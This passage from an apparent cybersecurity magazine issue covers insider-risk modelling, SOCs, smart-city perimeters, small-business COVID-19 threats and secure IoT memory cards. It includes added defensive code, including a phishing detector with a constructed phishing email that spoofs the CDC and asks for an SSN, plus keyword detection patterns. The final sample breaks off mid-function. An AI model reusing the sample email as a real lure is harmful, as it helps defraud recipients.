desired proactive response necessary to protect company assets, including the insiders themselves.<br />
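As an added illustration (not the article's or Haystax's model), a tiny Bayesian network over the Critical Path stages with constructed, purely illustrative probability tables. It shows the point made above: a technical anomaly on its own moves the posterior risk only modestly, while the same anomaly combined with stressors, concerning behaviour and a problematic organizational response (Jolene's situation) moves it a long way.<br />

```python
"""
Added example: exact inference in a small Bayesian network of insider-risk
indicators. Structure and every probability are constructed for illustration,
not taken from Haystax or the Critical Path paper.
"""
import itertools

# node -> (parents, P(node is True | parent values))
NETWORK = {
    "predisposition": ((), {(): 0.10}),
    "stressors": ((), {(): 0.30}),
    "concerning_behavior": (("predisposition", "stressors"),
                            {(False, False): 0.02, (True, False): 0.10,
                             (False, True): 0.15, (True, True): 0.45}),
    "problematic_org_response": (("concerning_behavior",),
                                 {(False,): 0.05, (True,): 0.40}),
    "insider_risk": (("concerning_behavior", "problematic_org_response"),
                     {(False, False): 0.001, (False, True): 0.01,
                      (True, False): 0.08, (True, True): 0.35}),
    # The technical indicator is modelled as a noisy symptom of risk: it also
    # fires on 3% of employees who present no risk at all.
    "technical_anomaly": (("insider_risk",), {(False,): 0.03, (True,): 0.50}),
}


def joint_probability(assignment: dict) -> float:
    """Probability of one complete assignment of all nodes."""
    p = 1.0
    for node, (parents, table) in NETWORK.items():
        p_true = table[tuple(assignment[parent] for parent in parents)]
        p *= p_true if assignment[node] else 1.0 - p_true
    return p


def posterior_risk(evidence: dict) -> float:
    """P(insider_risk = True | evidence), by enumerating the full joint.
    Six binary nodes give 64 assignments, so brute force is fine here."""
    nodes = list(NETWORK)
    numerator = denominator = 0.0
    for values in itertools.product((False, True), repeat=len(nodes)):
        assignment = dict(zip(nodes, values))
        if any(assignment[k] != v for k, v in evidence.items()):
            continue  # inconsistent with what was observed
        p = joint_probability(assignment)
        denominator += p
        if assignment["insider_risk"]:
            numerator += p
    return numerator / denominator


# Three evidence sets: nothing known, a technical alert alone, and the same
# alert in the context of non-technical Critical Path indicators.
SCENARIOS = {
    "prior": {},
    "technical anomaly only": {"technical_anomaly": True},
    "anomaly plus non-technical indicators": {
        "technical_anomaly": True, "stressors": True,
        "concerning_behavior": True, "problematic_org_response": True},
}


def score_scenarios() -> dict:
    return {name: posterior_risk(ev) for name, ev in SCENARIOS.items()}


if __name__ == "__main__":
    for name, risk in score_scenarios().items():
        print(f"{name:40s} P(insider risk) = {risk:.3f}")
```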
About the Author<br />
David Sanders is Director of Insider Threat Operations at Haystax, a<br />
business unit of Fishtech Group. Previously, he designed and managed<br />
the insider threat program at Harris Corporation, now L3Harris<br />
Technologies. David also served on the U.S. government’s National<br />
Insider Threat Task Force (NITTF). David can be reached online at<br />
(dsanders@haystax.com or https://www.linkedin.com/in/david-sandershaystax/)<br />
and at our company website http://www.haystax.com/<br />
Benefits of A Security Operation Center (SOC)<br />
By Pedro Tavares, Editor-in-Chief seguranca-informatica.pt<br />
The creation of a Security Operations Center (SOC) has increasingly stood out as something necessary<br />
to help companies defend themselves against damage caused by cyber-attacks. A SOC is considered the<br />
core of an organization's security operations, the purpose of which is to provide detection and response<br />
services for security incidents.<br />
Creating a SOC from scratch involves a large investment in human and technological resources,<br />
especially when it is intended to maintain operations on a full 24×7 scale. Implementing a SOC solution<br />
goes far beyond buying technologies and putting them into operation. First, there is a great shortage of<br />
qualified professionals, which makes it a real challenge to bring them into your organization. From a<br />
technological perspective, the right equipment and the right platforms can help you automate or at least<br />
optimize your incident detection and response capabilities. How to decide the best option: implement or<br />
hire a SOC? The answer is not simple.<br />
Create your own SOC or Hire a third-party SOC<br />
One of the advantages of creating your own SOC is having a team exclusively dedicated to achieving<br />
your goals. This team will have a deep understanding of the business. They will better understand the<br />
general context around events and have more knowledge about how you operate in contrast to a third<br />
party SOC.<br />
On the other hand, buying a SOC solution can be cost-effective. You may not need to buy software or<br />
equipment directly, and you won't have to hire or manage the team full time. A Managed Security Service<br />
Provider (MSSP) will take care of everything for you - from the integrity of the infrastructure to triage and<br />
incident response. Since technology and personnel costs will not be a preoccupation for you, the<br />
total investment value may end up being much lower.<br />
How to choose the best option<br />
The responses are not linear, but some questions can help you to make the final judgment.<br />
● How do security and SOC align with the business strategy and mission?<br />
● Do you intend to operate on a 24 × 7 scale?<br />
● Are the investments involved justified?<br />
● Does your business need greater control by demanding its own SOC?<br />
● What would happen to your business if it suffered a security breach?<br />
When considering the last question, if the impact is minimal, it is suggested to hire a SOC solution. If the<br />
impact is quite significant, then I advise you to develop your own SOC solution.<br />
Developing a SOC can be very costly if not done in the right way. Some mistakes can even compromise<br />
your business goals and objectives. The lack of experienced professionals in the market definitely makes<br />
managing your own SOC a little more challenging - the demand is huge, and your partners and<br />
competitors are looking for the same resources as you.<br />
In sum, the challenge of implementing a SOC in your organization is enormous, but the benefits are<br />
evident:<br />
● Continuous Protection: Having a command center that monitors your network and/or facility 24/7.<br />
● Timely Response: The gap between critical event and response time narrows.<br />
● Help Customers/Stakeholders Feel Secure: A security command center can serve external and<br />
internal marketing purposes as well.<br />
● Simplify Investigations: Capabilities of a security operations center on hand can expedite the process<br />
of analysis.<br />
And last but not least, a SOC solution can provide insight on identifying threats before they become<br />
critical events.<br />
About the Author<br />
Pedro Tavares is a cybersecurity professional and a<br />
founding member of CSIRT.UBI and Editor-in-Chief of<br />
seguranca-informatica.pt.<br />
In recent years he has invested in the field of information<br />
security, exploring and analyzing a wide range of topics,<br />
malware, ethical hacking (OSCP-certified), cybersecurity,<br />
IoT and security in computer networks. He is also a Freelance Writer.<br />
Segurança Informática blog: www.seguranca-informatica.pt<br />
LinkedIn: https://www.linkedin.com/in/sirpedrotavares<br />
Twitter: https://twitter.com/sirpedrotavares<br />
Contact me: ptavares@seguranca-informatica.pt<br />
In <strong>2020</strong>, SOCs Are Understaffed Yet Overconfident in<br />
Ability to Detect <strong>Cyber</strong>threats<br />
Exabeam’s ‘<strong>2020</strong> State of the SOC Report’ offers peer-to-peer SOC comparisons<br />
By Steve Moore, chief security strategist, and Samantha Humphries, senior product marketing<br />
manager, Exabeam<br />
Security operations centers (SOCs) are on the front lines in protecting businesses and government<br />
agencies against cyberthreats and attacks. Whether the organization has an in-house or<br />
outsourced SOC, it is therefore critical to gauge its effectiveness, given the role it plays in the overall<br />
cybersecurity posture.<br />
Exabeam’s <strong>2020</strong> State of the SOC Report allows organizations to compare their SOCs to those of their<br />
peers around the globe and determine common pitfalls, priorities and ways to improve technology,<br />
staffing, employee happiness and more. Highlights include:<br />
This report is Exabeam’s third annual comprehensive survey of cybersecurity professionals who<br />
manage and operate SOCs. Respondents include CISOs, CIOs, frontline security analysts, and security<br />
managers from the U.S., U.K., Canada, Germany, and Australia. The report covers a wide range of<br />
topics including basic SOC operations, hiring and staffing, operational processes, technology, and finance<br />
and budget.<br />
Key findings include that SOC leaders and analysts are confident in their ability to detect common security<br />
threats, but leaders and frontline analysts do not agree on which threats are the most common ones<br />
facing the organization. SOC leaders believe that phishing and supply chain<br />
vulnerabilities are the more important issues, while analysts see DDoS attacks and ransomware as the greater<br />
threats.<br />
However, threat hunting and the ability to remediate threats effectively stand out as critical skills that SOC<br />
personnel feel they lack. This gap may indicate that SOCs are overconfident in their ability to detect a full<br />
range of security threats.<br />
Figure 1: Eighty-two percent of SOC professionals are confident in their ability to detect threats.<br />
Figure 2: SOC leaders believe that phishing and supply chain vulnerabilities are more important issues,<br />
while analysts see DDoS attacks and ransomware as greater threats.<br />
In last year’s report, respondents cited personal and social skills as the most critical soft skill for SOC<br />
employees. This year, however, 62% of respondents noted the ability to work in teams as the most<br />
important soft skill.<br />
Figure 3: While hard skills remain critical, SOCs place emphasis on soft skills with the ability to work in<br />
teams taking precedence over formerly reported social ability.<br />
The importance placed on teaming is an indication that SOC staff need to work in cohesive teams and<br />
often with staff from other teams. SOC members that work as a team are more apt to document processes<br />
to standardize tasks and train new employees, which is helpful both when teams grow and when staff are reassigned.<br />
Members of a SOC should not only improve teaming among their group, but also proactively strengthen<br />
their working relationship with other functional groups, including IT operations, NOC staff, and<br />
increasingly, DevOps. Working with these other groups helps to improve response time. More important,<br />
it will create a team that is responsive and able to adapt as the work environment shifts due to challenges<br />
like working with a distributed workforce and ensuring the right collaboration and communications tools<br />
and culture are in place.<br />
The report also reveals a significant decline in the ability to do threat modeling in both the U.S. and U.K.<br />
SOCs. Threat modeling is the systematic approach to identifying and prioritizing potential security threats<br />
and designing countermeasures to prevent them. The data suggests threat modeling doesn’t have an<br />
agreed upon standard, and most analysts perform it infrequently or not at all.<br />
Additionally, the ability to conduct incident analysis, and to carry out budget and resource allocation, has<br />
declined from the previous year in both countries.<br />
Figure 4: U.S. and U.K. SOCs reported significant declines in their ability to do threat modeling, incident<br />
analysis and budget/resource allocation in YoY change.<br />
The findings also show that when asked to rate pain points, inexperienced staff and time spent on<br />
reporting/documentation were common issues for managers and frontline employees but not for<br />
executives.<br />
Lending credence again to the statement, “you can’t protect what you can’t see,” senior leaders noted<br />
that the lack of visibility and not having a good list of assets were their most significant pain points.<br />
Figure 5: Inexperienced staff and too much time spent on reporting and documentation continue to be<br />
pain points for SOCs in <strong>2020</strong>.<br />
Traditionally, SOC teams have had two primary responsibilities — investigating<br />
suspicious activities and maintaining security tools. Over the years, however, the responsibilities of the SOC<br />
have expanded to include other duties such as defining security metrics and incident response. Our report<br />
finds that staff at all levels share these responsibilities. However, there are a couple of differences.<br />
CIOs and CISOs rank their responsibility for operations management as well as policy and procedure<br />
development highest. They also share other responsibilities with managers and frontline employees,<br />
including defining security objectives and metrics and incident response. Not surprisingly, maintaining<br />
security monitoring tools was noted as a critical responsibility for frontline employees.<br />
Figure 6: SOC managers drive metrics specifically in operations and management and procedure and<br />
policy development.<br />
Download the complete report to learn other points of interest that can help measure the effectiveness<br />
of your SOC and support you in your ongoing efforts to protect your organization.<br />
About the Author<br />
Samantha Humphries<br />
Senior Product Marketing Manager<br />
Samantha has 20 years of experience in cyber security. She has<br />
defined strategy for multiple security products and technologies,<br />
helped hundreds of organisations of all shapes, sizes, and<br />
geographies recover and learn from cyberattacks, and trained<br />
anyone who’ll listen on security concepts and solutions. She<br />
authors articles for various security publications, and is a regular<br />
speaker and volunteer at industry events, including BSides,<br />
IPExpo, <strong>Cyber</strong>SecurityX, The Diana Initiative, and Blue Team<br />
Village (DEFCON).<br />
Stephen Moore<br />
Chief Security Strategist<br />
Steve Moore is Vice President and Chief Security Strategist at<br />
Exabeam, helping drive solutions for threat detection and<br />
advising customers on security programs and breach response.<br />
He is the host of the “The New CISO Podcast” and a Forbes<br />
Tech Council member. Prior to Exabeam, Moore served as Staff<br />
VP of <strong>Cyber</strong>security Analytics at Anthem, a Fortune 30<br />
healthcare company. Moore’s experience includes leading the<br />
investigation of state sponsored cyberespionage campaigns,<br />
breach response, associated legal depositions, and client<br />
management. He’s passionate about cybersecurity, teamwork and leadership excellence.<br />
Software-Defined Perimeters Offer Secure Connectivity<br />
to Smart Cities<br />
By Don Boxley, CEO and Co-Founder, DH2i (www.dh2i.com)<br />
Smart cities are on the rise—in a really big way. According to Microsoft, smart-city initiatives—which can<br />
be defined as cities that rely on Internet of Things (IoT) sensors to obtain data that’s then mined to guide<br />
management of city services and resources—account for nearly a quarter (23 percent) of the world’s IoT<br />
projects.<br />
As the number of smart cities mushrooms, their connected systems are becoming increasingly<br />
critical to how seamlessly these urban areas operate. This is an important point to grasp, since cities serve<br />
as the linchpin for most of the world’s data generation, as well as the majority of all energy consumption.<br />
What’s more, most of us live in cities. The UN reports that just over half (55 percent) of the world’s<br />
population makes a city their home—a figure that the UN predicts will rise significantly (close to 70<br />
percent) in the next 30 years.<br />
Here are some additional stats to impress upon you the importance of our urban areas in general, and<br />
smart city growth in particular:<br />
• Forbes reports that by 2025, we’ll be looking at approximately 80 billion smart<br />
devices.<br />
• By then, our global cities may be cranking out up to 180 zettabytes of data.<br />
• In terms of energy production, The World Bank reports that our urban meccas already consume up<br />
to 80 percent of the energy produced worldwide.<br />
• Over the next decade, cities will likely be responsible for close to three-quarters (74 percent) of<br />
global greenhouse gases, up from around two-thirds, or 67 percent, currently.<br />
Adding Predictability with Smart Edge Devices<br />
It can feel overwhelming to consider the vast scope of the challenges that face today’s cities. Cities are<br />
charged with managing an ever-expanding laundry list of problems, including transportation, water and<br />
energy, public health, infrastructure, public safety, waste reduction, and more. As the current COVID-19<br />
global pandemic is showing, the high population and density of cities can quickly turn them<br />
into a hotbed of issues that require the best that technology can offer to aid communication and mitigate<br />
complexities.<br />
To that end, studies have proven the value of edge computing and smart IoT edge devices, particularly<br />
when it comes to smart cities. A comprehensive survey on “Edge Computing Enabled Smart Cities” by<br />
Khan et al. for the Institute of Electrical and Electronics Engineers (IEEE) stated that “it is evident from<br />
literature that IoT is an integral part of smart cities. The next step is enabling the resource intensive and<br />
strict latency IoT based smart city applications. Edge computing provides a promising way of enabling<br />
these applications by offering computation and storage resources with low latency.”<br />
However, metropolises still have a significant issue to figure out—security—when leveraging the power<br />
of edge computing in smart cities. How can our global municipalities offer secure connectivity from their<br />
datacenters (as well as from the cloud) to the edge? The answer lies in the secure environment provided<br />
by software-defined perimeter (SDP) technology.<br />
Safeguarding the Edge<br />
SDP software provides the needed security for smart IoT edge devices by creating a “zero trust”<br />
environment. This means edge devices don’t have full network access, but instead can only access the<br />
exact applications that the city’s IT department has authorized them to see, whether in the cloud or<br />
datacenter.<br />
In other words, SDP allows access at the application level only, not at the network level. As a result,<br />
lateral movement across the network is blocked, and smart cities can enjoy the “secure by default” architecture that<br />
they require.<br />
Here’s how SDP solutions work to help create secure, hyperconnected smart cities:<br />
• SDP software allows for data transfer, by way of encrypted micro-tunnels, right from smart IoT<br />
edge devices to various destinations—whether an on-premises site, multi-cloud, or hybrid-cloud<br />
setting.<br />
• To ensure secure connectivity and transmission, SDP also uses public key authentication.<br />
• Specific types of SDP software make this happen through an enhanced user datagram protocol<br />
(UDP), which has randomly generated ports that render the tunnels basically invisible to<br />
cybercrooks.<br />
Other benefits for city IT staff include easy configuration and management, which aids<br />
scalability. The software requires no appliances, and it avoids the maintenance and security<br />
challenges of VPNs, which were designed for a physical-server environment. SDP has performance<br />
advantages as well, and the encrypted micro-tunnels can be made highly available.<br />
Smart devices and edge computing have a proven ability to help smart cities advance and problem-solve—<br />
but without secure connectivity, these measures fall short. By pairing an SDP client with smart devices,<br />
those who are working on creating the hyperconnected smart cities that will take us into the future can<br />
safeguard their investment of time, resources, and data as well.<br />
About the author<br />
Don Boxley Jr is a DH2i co-founder and CEO. Prior to DH2i, Don spent<br />
more than 20 years in management positions for leading technology<br />
companies, including Hewlett-Packard, CoCreate Software, Iomega,<br />
TapeWorks Data Storage Systems and Colorado Memory Systems. Don<br />
earned his MBA from the Johnson School of Management, Cornell<br />
University.<br />
Managing Small Business <strong>Cyber</strong>security During Covid-19<br />
By Bill DeLisi, CEO of GOFBA<br />
Small businesses are undertaking extraordinary changes during the coronavirus epidemic. They’re<br />
laying off staff, shifting their business models, and managing the challenges of remote work. The pace<br />
of the stay-at-home orders and the abrupt halt of the economy required small businesses to move<br />
quickly. States are in the midst of gradually reopening, but many smaller firms will continue to face<br />
impactful challenges for the rest of the year and beyond. In addition to safety and health<br />
concerns, small firms are also facing cybersecurity risks.<br />
Compared to enterprise-level firms, small businesses do not possess massive IT budgets to confront<br />
threats. Large firms have the capital to weather business interruptions that might come from data breaches.<br />
Small businesses, already devastated by COVID-19, can’t risk losing data and being offline<br />
for even a day. And there’s the PR hit that comes with a data breach. A small firm is unlikely to<br />
survive a breach, especially in the current economy where competition for dollars is at a premium.<br />
Unfortunately, there are many bad actors out there. <strong>Cyber</strong>attacks are rising during the<br />
COVID-19 pandemic, as hackers prey on fear and uncertainty. To that end, here are three of the most<br />
persistent and damaging COVID-19-driven security threats for small businesses, along with some tips for<br />
mitigating the risks.<br />
1. Stop Malware in its Tracks<br />
Malware encompasses spyware, viruses, trojans, and other tools hackers use to infect computers. The<br />
actual programs arrive in attachments or hide within software such as PDF viewers. Staff members must avoid<br />
downloading unapproved programs and understand the types of actions that can lead to a malware infection.<br />
The COVID-19 outbreak offers opportunity for hackers. For example, there’s malware embedded in some<br />
live maps of the virus’ spread. COVID-19 themed malware that wipes a computer clean is also circulating.<br />
Firewalls and anti-malware programs are a first line of defense for small businesses. These programs<br />
must use automatic updating for maximum protection so they can detect the latest threats.<br />
Workers now operating from home are exposing their company’s data and networks. They’re using home<br />
Wi-Fi, and many are searching on non-approved or dangerous websites. Restricting search for remote<br />
workers is tricky but is possible through a secure search engine such as GOFBA. This platform limits<br />
malware by stopping users from reaching suspicious sites, while still allowing them to access information<br />
that pertains to their jobs. Small business staff should also limit their information gathering about the<br />
COVID-19 epidemic to established news and health organization sites. Unknown sites filled with<br />
information about pandemic “cures” or various conspiracy theories and other content are likely filled with<br />
malware.<br />
2. Prevent Phishing<br />
Phishing schemes are simple. A hacker creates a formal-looking email and sends it out to a large group<br />
of recipients. Their goal is for someone to open the email and either click a link or download an<br />
attachment. That simple action then launches malware which infects the person’s computer and the<br />
linked company network. The hacker then controls the firm’s data, encrypts it, and holds it for ransom.<br />
The pandemic provides ample material for phishing schemes. Emails touting fake COVID-19 tests or<br />
miracle cures prey on people’s fear about the virus. Other emails pushing for donations to charities prey<br />
on people’s willingness to help, while directing money to fraudulent accounts. Many phishing emails<br />
mimic communications from local government agencies or the CDC, with official-sounding messages<br />
about pandemic news or recommended actions.<br />
Small business workers must learn about the dangers of such emails, and how to recognize fake and<br />
dangerous communications. The typical phishing email gives itself away with some clues:<br />
• Amateurish design with outdated graphics and feel<br />
• Unprofessional-sounding content with misspellings<br />
• Odd URLs that do not match the company/organization (users can hover their mouse on links to<br />
see the destination address)<br />
• The email asks the recipient to confirm personal information, such as “Enter your SSN to see if<br />
you qualify for free COVID-19 testing”<br />
• Messages that play on panic and suggest urgent action are very often phishing schemes<br />
Remote employees need a better understanding about phishing emails and should err on the side of<br />
caution before clicking any links or attachments. Remind the employees that deleting the email is the<br />
safest move.<br />
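As an added illustration (not code from the article or from GOFBA), the Go program below parses a constructed sample e-mail and reports which of the clues listed above it matches: a link whose real destination differs from the text shown or from the sender’s domain, urgent language, and a request for personal information. Both sample messages, the domain names in them and the keyword lists are constructed for the example.<br />

```go
package main

import (
	"fmt"
	"io"
	"net/mail"
	"regexp"
	"strings"
)

// Constructed sample (not a real message) showing three clues from the article's
// list: link text hiding a different destination, a request for an SSN, and urgency.
const sampleEmail = `From: "CDC Alerts" <alerts@cdc.gov>
Subject: URGENT: confirm eligibility for free COVID-19 testing

Act immediately! Enter your SSN to see if you qualify for free COVID-19 testing:
<a href="http://cdc-gov-testing.example.net/verify">https://www.cdc.gov/verify</a>
`

// Constructed benign sample: link matches the sender's domain, no urgency, no PII request.
const benignEmail = `From: "IT Helpdesk" <helpdesk@example-smallbiz.test>
Subject: Updated remote work policy

The updated policy is on the intranet:
<a href="https://intranet.example-smallbiz.test/policy">intranet.example-smallbiz.test/policy</a>
`

var (
	anchorRe  = regexp.MustCompile(`(?is)<a\s+[^>]*href="([^"]+)"[^>]*>(.*?)</a>`)
	hostRe    = regexp.MustCompile(`(?i)^https?://([^/\s]+)`)
	// Text clues from the article's list: panic/urgency and requests for personal data.
	urgencyRe = regexp.MustCompile(`(?i)\b(urgent|immediately|act now|within 24 hours)\b`)
	pidRe     = regexp.MustCompile(`(?i)\b(ssn|social security|password|bank account)\b`)
)

// PhishingClue is one warning sign from the article's list found in a message.
type PhishingClue struct{ Clue, Detail string }

// registrableDomain keeps the last two labels of a host, enough for the hover-and-compare check.
func registrableDomain(host string) string {
	parts := strings.Split(strings.ToLower(strings.Split(host, ":")[0]), ".")
	if len(parts) > 2 {
		parts = parts[len(parts)-2:]
	}
	return strings.Join(parts, ".")
}

// hostOf returns the host of an http(s) URL, or "" when the text is not a URL.
func hostOf(url string) string {
	if m := hostRe.FindStringSubmatch(strings.TrimSpace(url)); m != nil {
		return m[1]
	}
	return ""
}

// FindPhishingClues parses a raw RFC 5322 message and reports which of the
// article's clues it matches: a triage aid for a human reviewer, not a verdict.
func FindPhishingClues(raw string) ([]PhishingClue, error) {
	msg, err := mail.ReadMessage(strings.NewReader(raw))
	if err != nil {
		return nil, err
	}
	bodyBytes, err := io.ReadAll(msg.Body)
	if err != nil {
		return nil, err
	}
	body := string(bodyBytes)
	senderDomain := ""
	if addr, err := mail.ParseAddress(msg.Header.Get("From")); err == nil {
		senderDomain = registrableDomain(addr.Address[strings.LastIndex(addr.Address, "@")+1:])
	}
	var clues []PhishingClue
	// Clue: odd URLs that do not match the organisation (what hovering over a link reveals).
	for _, m := range anchorRe.FindAllStringSubmatch(body, -1) {
		href, shown := m[1], strings.TrimSpace(m[2])
		hrefDom := registrableDomain(hostOf(href))
		if shownHost := hostOf(shown); shownHost != "" && registrableDomain(shownHost) != hrefDom {
			clues = append(clues, PhishingClue{"link text and destination differ", shown + " -> " + href})
		} else if senderDomain != "" && hrefDom != "" && hrefDom != senderDomain {
			clues = append(clues, PhishingClue{"link domain differs from sender", href})
		}
	}
	text := msg.Header.Get("Subject") + "\n" + body
	if hit := urgencyRe.FindString(text); hit != "" {
		clues = append(clues, PhishingClue{"urgent language", hit})
	}
	if hit := pidRe.FindString(text); hit != "" {
		clues = append(clues, PhishingClue{"asks for personal information", hit})
	}
	return clues, nil
}

func main() {
	for _, raw := range []string{sampleEmail, benignEmail} {
		clues, err := FindPhishingClues(raw)
		fmt.Println(len(clues), clues, err)
	}
}
```

The keyword lists are deliberately short; in practice they would be tuned to the organisation and the result used to route a message for human review, not to block it automatically.<br />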
3. Properly Manage BYOD<br />
With a massive move towards remote work comes the need for laptops and phones to connect to work.<br />
Some firms provide employees with devices. Others use a BYOD, or “Bring Your Own Device” policy that<br />
allows employees to utilize their personal device to access work software.<br />
There are multiple risks when employees use their own devices for work. Since they’re at home and<br />
comfortable with their phone and laptop, many users will engage in riskier searches and look at sites<br />
they’d never consider at the workplace. These sites increase exposure to malware, which then puts the<br />
connected company networks at risk.<br />
Small businesses must take the time to implement personal device policies. This includes detailing how<br />
employees are accessing and storing company data. For example, are staff saving information to their<br />
laptops? Are they using unsecured cloud storage through Google or Dropbox instead of the corporate<br />
cloud? Do employees use strong passwords and two-factor authentication? What happens to data access when a remote<br />
worker leaves a company? A formal plan is essential for protecting both the company and the employees.<br />
Companies must strike a balance during this work-from-home period. They need to protect their data<br />
through rules and processes while also giving staff enough flexibility to access needed information. There<br />
are also privacy considerations in play. Small business owners must understand the employee’s family<br />
members are also using the home Wi-Fi, so there’s only so much control the owners can exert. A solid<br />
approach for remote workers is to create formal guidelines to include mobile device management<br />
software that automates updates, features virus detection, and gives employees limited control. The key<br />
is transparency: both the employee and the employer should be on the same page regarding expectations and<br />
rules. And as the pandemic eases in some areas, business owners must decide if workers can remain at<br />
home, need to come back to offices, or if they will adopt a hybrid approach.<br />
Key Takeaway<br />
During the pandemic, small business owners are pivoting while trying to retain good employees.<br />
<strong>Cyber</strong>security threats are an additional unneeded stressor for already strained companies. Thankfully,<br />
by following guidelines for remote workers and managing risks, firms can reduce the chances of a<br />
cybersecurity event and focus on making it through the crisis.<br />
About the Author<br />
Bill DeLisi is one of the world’s most authoritative experts on<br />
cybersecurity. He is currently the Chief Executive Officer, Chief<br />
Technology Officer and a founding member of the Board of<br />
Directors for GOFBA, Inc. DeLisi has more than 30 years of<br />
experience in the computer industry, including holding the position<br />
of Chief Technology Officer at several companies. He has worked<br />
closely with Microsoft Gold Certified Partners, helping pioneer<br />
“cloud” computing and creating security infrastructures that are still<br />
in use today. DeLisi is responsible for the development of<br />
proprietary technology that serves as the backbone of GOFBA’s<br />
platform and has over 30 certifications with Microsoft, Cisco, Apple,<br />
and others, which includes the coveted Systems Engineer with<br />
Advanced Security certification, as well as expert status in Cloud<br />
Design and Implementation.<br />
Bill DeLisi, CEO of GOFBA. Bill can be reached via email at bill@gofba.com or on his company website<br />
www.GOFBA.com.<br />
IOT Security Embedded in Memory Cards<br />
AS DEVICES, MACHINERY AND MANUFACTURING PLANTS GET SMARTER, THEY ALSO<br />
BECOME MORE VULNERABLE.<br />
By Hubertus Grobbel, Vice President Security Solutions, Swissbit.<br />
When designing networked devices, machinery and production facilities, developers need to place more<br />
focus on security aspects. Swissbit now offers a flexible, hardware-based approach that includes TPM<br />
(Trusted Platform Module) and data encryption.<br />
For IT and data security, systems communicating over the Internet, or via their gateways in the IoT<br />
(Internet of Things), need to have a unique and non-cloneable identity. Systems must also be able to<br />
send, receive and store strongly, cryptographically secured data. Solutions that rely on<br />
software alone rarely offer sufficient protection, which presents developers and manufacturers with great<br />
challenges.<br />
Swissbit, the storage and security expert, offers a new hardware-based approach. Developers of<br />
embedded systems for industrial applications know Swissbit as the only independent European<br />
manufacturer of flash memory products. Many see the Swiss company, manufacturing in Germany, as<br />
their top choice for robust, durable SSDs with PCIe and SATA interfaces, CompactFlash, USB flash<br />
drives, SD and microSD memory cards and managed NAND BGAs.<br />
Based on decades of experience in the protection of stored data, Swissbit has now developed a new<br />
advanced approach to security for embedded IoT devices. The thinking behind the development<br />
is that every device needs memory anyway: as a boot medium, for log files, and as a data cache in case<br />
of network failures. These memory interfaces can and should carry security features.<br />
Security in memory card format<br />
Swissbit’s new security solution consists of a flash memory chip, produced and tested for industrial<br />
requirements. The chip runs a special version of the durabit firmware with an integrated AES 256-bit<br />
encryptor (Fig. 1). The DP (Data Protection) version encrypts and protects all data in various ways (CD-<br />
ROM mode, PIN protection, hidden memory, WORM mode). For hardware-based protection of<br />
communication in the IoT, another security anchor is required: Swissbit’s security modules come with<br />
a secure element such as an Infineon/NXP smart card chip certified to Common Criteria EAL 5+/6+. An API, an SDK and a PKCS#11<br />
library are available for application development.<br />
Fig 1. The structure of a microSD card with security features.<br />
Designating an ID to things<br />
Security experts trust microSD cards with a secure element for encrypting mobile phone<br />
communications. Just as with communication between people, the communication of things across<br />
the Internet also needs identification, authentication and authorization. In other words, how<br />
does a “thing” know that the data or data queries received from another “thing” are correct and that the<br />
source of a message is truly the system component it claims to be? Swissbit security memory media<br />
with a secure element provide applications and systems with a unique identity. “Things” get a counterfeit-proof<br />
ID, so networked systems can be protected from misuse and “identity theft”, and data access<br />
can be restricted. Smart card chips integrated into memory cards give systems non-cloneable<br />
identities, transforming them into uniquely identifiable M2M (machine-to-machine)<br />
communication participants that can authenticate themselves and send and receive strongly,<br />
cryptographically secured data.<br />
Another important device-specific application for these Swissbit solutions is Trusted Boot. Trusted Boot<br />
ensures that software can only be run on specific hardware or hardware classes. A secure flash memory<br />
card can be used to manage software licensing and feature activation. Access control, code encryption<br />
or digital signature allow the definition and management of different software configurations for products.<br />
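The identity and Trusted Boot mechanisms described above, as an added Go illustration (not Swissbit’s firmware, API or PKCS#11 library): a hypothetical SecureElement type stands in for the smart card chip, Ed25519 stands in for whatever signature scheme the real chip implements, and the participant IDs, hardware class names and firmware bytes are constructed. It shows a challenge/response between two “things” whose private keys never leave their secure elements, and a boot check that accepts a firmware image only when it was signed for this hardware class.<br />

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// SecureElement is a hypothetical model of the smart card chip on the memory card: the
// private key is generated inside and never leaves; callers only get signatures and the public key.
type SecureElement struct{ priv ed25519.PrivateKey }

func NewSecureElement() (*SecureElement, error) {
	_, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &SecureElement{priv: priv}, nil
}

// PublicKey is the device's non-cloneable identity as seen by other participants.
func (se *SecureElement) PublicKey() ed25519.PublicKey {
	return se.priv.Public().(ed25519.PublicKey)
}

func (se *SecureElement) Sign(msg []byte) []byte { return ed25519.Sign(se.priv, msg) }

// Registry maps participant IDs to public keys, provisioned out of band.
type Registry map[string]ed25519.PublicKey

// NewChallenge returns a fresh nonce; a response is only valid for this challenge.
func NewChallenge() ([]byte, error) {
	nonce := make([]byte, 32)
	_, err := rand.Read(nonce)
	return nonce, err
}

// authMessage binds the nonce to both participants so a response cannot be
// replayed to a different verifier or attributed to a different prover.
func authMessage(proverID, verifierID string, nonce []byte) []byte {
	h := sha256.New()
	h.Write([]byte("m2m-auth|" + proverID + "|" + verifierID + "|"))
	h.Write(nonce)
	return h.Sum(nil)
}

// Respond is run by the prover: it signs the challenge inside its secure element.
func Respond(se *SecureElement, proverID, verifierID string, nonce []byte) []byte {
	return se.Sign(authMessage(proverID, verifierID, nonce))
}

// Authenticate is run by the verifier against the registered key of proverID.
func Authenticate(reg Registry, proverID, verifierID string, nonce, resp []byte) error {
	pub, ok := reg[proverID]
	if !ok {
		return errors.New("unknown participant: " + proverID)
	}
	if !ed25519.Verify(pub, authMessage(proverID, verifierID, nonce), resp) {
		return errors.New("authentication failed for " + proverID)
	}
	return nil
}

// bootMessage binds the firmware hash to a hardware class, so an image signed
// for one class is rejected on another (the "specific hardware" property).
func bootMessage(hardwareClass string, image []byte) []byte {
	sum := sha256.Sum256(image)
	h := sha256.New()
	h.Write([]byte("trusted-boot|" + hardwareClass + "|"))
	h.Write(sum[:])
	return h.Sum(nil)
}

// SignFirmware is run by the vendor with its own signing key.
func SignFirmware(vendor *SecureElement, hardwareClass string, image []byte) []byte {
	return vendor.Sign(bootMessage(hardwareClass, image))
}

// VerifyBoot is run by the device at start-up with the vendor key it trusts; the image runs only if true.
func VerifyBoot(vendorPub ed25519.PublicKey, hardwareClass string, image, sig []byte) bool {
	return ed25519.Verify(vendorPub, bootMessage(hardwareClass, image), sig)
}

func main() {
	vendor, _ := NewSecureElement()
	sensor, _ := NewSecureElement()
	reg := Registry{"sensor-01": sensor.PublicKey()}
	nonce, _ := NewChallenge()
	resp := Respond(sensor, "sensor-01", "gateway-01", nonce)
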